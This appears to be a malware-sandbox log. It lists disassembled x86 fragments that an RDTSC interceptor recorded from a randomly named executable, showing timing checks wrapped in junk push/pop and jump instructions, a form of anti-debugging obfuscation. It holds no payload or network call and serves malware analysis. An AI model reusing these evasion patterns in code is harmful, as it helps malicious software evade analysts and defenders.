Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10856BB second address: 10856DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F78B909B0F6h 0x00000010 jmp 00007F78B909B104h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10856DF second address: 10856E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10856E3 second address: 10856F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007F78B909B0F6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1088BCA second address: 1088BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 100F4A7 second address: 100F4B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jnc 00007F78B909B0F6h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 100F4B7 second address: 100F4CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F78B9095CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F78B9095CE6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108F5BC second address: 108F5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108DEF5 second address: 108DF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F78B9095CF4h 0x0000000e jmp 00007F78B9095CF7h 0x00000013 pop esi 0x00000014 push eax 0x00000015 jl 00007F78B9095CE6h 0x0000001b pop eax 0x0000001c jmp 00007F78B9095CEDh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push edx 0x00000028 pop edx 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108E0C8 second address: 108E0F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F78B909B0FFh 0x0000000a jmp 00007F78B909B105h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108E6D9 second address: 108E6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF0h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108E6F2 second address: 108E707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B101h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108E707 second address: 108E713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108E86D second address: 108E87E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B0FBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108E9D1 second address: 108E9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108EB87 second address: 108EB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F78B909B0F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108ECFA second address: 108ED03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108ED03 second address: 108ED07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108ED07 second address: 108ED27 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CE6h 0x00000008 jmp 00007F78B9095CF6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 108EEB3 second address: 108EEBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1035D4E second address: 1035D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1035D58 second address: 1035D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 109414B second address: 109415E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEDh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 104F8CA second address: 104F8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 104F8CF second address: 104F8E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F78B9095CE6h 0x00000009 je 00007F78B9095CE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 104F8E8 second address: 10351D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F78B909B0F8h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F78B909B0F8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+12A01DE8h], ecx 0x0000002d call dword ptr [ebp+12B835BEh] 0x00000033 jne 00007F78B909B11Ch 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e jg 00007F78B909B0F6h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 104F9E9 second address: 104F9ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 104F9ED second address: 104FA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, ebx 0x00000007 and edi, 5ED055A0h 0x0000000d mov ecx, dword ptr [ebp+12A038FFh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov di, ax 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov ecx, dword ptr [ebp+12A03927h] 0x0000002a pushad 0x0000002b clc 0x0000002c jc 00007F78B909B0FBh 0x00000032 adc di, FCF7h 0x00000037 popad 0x00000038 mov dword ptr [ebp+12BB36A4h], esp 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F78B909B0F8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Ah 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 mov cl, E9h 0x0000005a cmp dword ptr [ebp+12A038CFh], 00000000h 0x00000061 jne 00007F78B909B16Ah 0x00000067 mov dword ptr [ebp+12A032ECh], edi 0x0000006d mov byte ptr [ebp+12A01860h], 00000047h 0x00000074 add dx, D7DEh 0x00000079 mov eax, D49AA7D2h 0x0000007e cmc 0x0000007f nop 0x00000080 jnl 00007F78B909B104h 0x00000086 jmp 00007F78B909B0FEh 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e push esi 0x0000008f pushad 0x00000090 popad 0x00000091 pop esi 0x00000092 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1050B91 second address: 1050B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1050B98 second address: 1035D4E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F78B909B0FEh 0x0000000e nop 0x0000000f call dword ptr [ebp+12B8D1ACh] 0x00000015 pushad 0x00000016 jnc 00007F78B909B110h 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 1093627 second address: 1093637 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10937C1 second address: 10937C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10937C5 second address: 10937CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10937CB second address: 10937D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 10937D7 second address: 109381D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F78B9095CECh 0x0000000c jo 00007F78B9095CEEh 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F78B9095CE6h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007F78B9095CEBh 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jnc 00007F78B9095CF4h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1093B6D second address: 1093B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1098969 second address: 1098985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F78B9095CF2h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1098985 second address: 10989BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B106h 0x00000009 jng 00007F78B909B0F6h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F78B909B105h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1098DBF second address: 1098E0B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jo 00007F78B9095CE6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F78B9095CF0h 0x00000012 jnc 00007F78B9095CE6h 0x00000018 jmp 00007F78B9095CF3h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F78B9095CF1h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10993C6 second address: 10993E0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F78B909B0F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1099547 second address: 1099569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F78B9095CE6h 0x0000000e jmp 00007F78B9095CF4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1099818 second address: 109983D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F78B909B103h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109983D second address: 1099874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F78B9095CF3h 0x0000000e jmp 00007F78B9095CF9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BF9E second address: 109BFA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BB3A second address: 109BB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BB3E second address: 109BB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCC4 second address: 109BCC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCC8 second address: 109BCCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCCC second address: 109BCD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109BCD2 second address: 109BCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109F025 second address: 109F032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F78B9095CE6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109F032 second address: 109F04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B101h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109F04E second address: 109F054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109E8FD second address: 109E906 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109E906 second address: 109E90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109E90C second address: 109E916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109EBC5 second address: 109EBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 109ED64 second address: 109ED7B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B909B0F6h 0x00000008 jng 00007F78B909B0F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A0954 second address: 10A095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A1FBA second address: 10A1FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A629F second address: 10A62A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A63D3 second address: 10A63D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A63D9 second address: 10A6401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F78B9095CF9h 0x0000000c jg 00007F78B9095CE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A655E second address: 10A6577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A6577 second address: 10A6587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F78B9095CE6h 0x0000000a ja 00007F78B9095CE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A6587 second address: 10A658B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A66ED second address: 10A6707 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A6707 second address: 10A670B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10A670B second address: 10A6724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEFh 0x00000007 jg 00007F78B9095CE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD94D second address: 10AD98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FEh 0x00000009 jmp 00007F78B909B106h 0x0000000e jmp 00007F78B909B106h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD98C second address: 10AD9AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD9AB second address: 10AD9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD9B9 second address: 10AD9D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B9095CF8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD9D7 second address: 10AD9DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC45E second address: 10AC462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC462 second address: 10AC471 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC724 second address: 10AC75D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F78B9095CF4h 0x00000012 jmp 00007F78B9095CF1h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC75D second address: 10AC764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC939 second address: 10AC945 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B9095CEEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AC945 second address: 10AC94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10ACAAE second address: 10ACAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CEFh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F78B9095CECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD5AE second address: 10AD5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F78B909B0F6h 0x0000000a pop ecx 0x0000000b jmp 00007F78B909B106h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10AD5CF second address: 10AD5EC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F78B9095CEEh 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B09BA second address: 10B09C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10B09C2 second address: 10B09E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F78B9095CF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
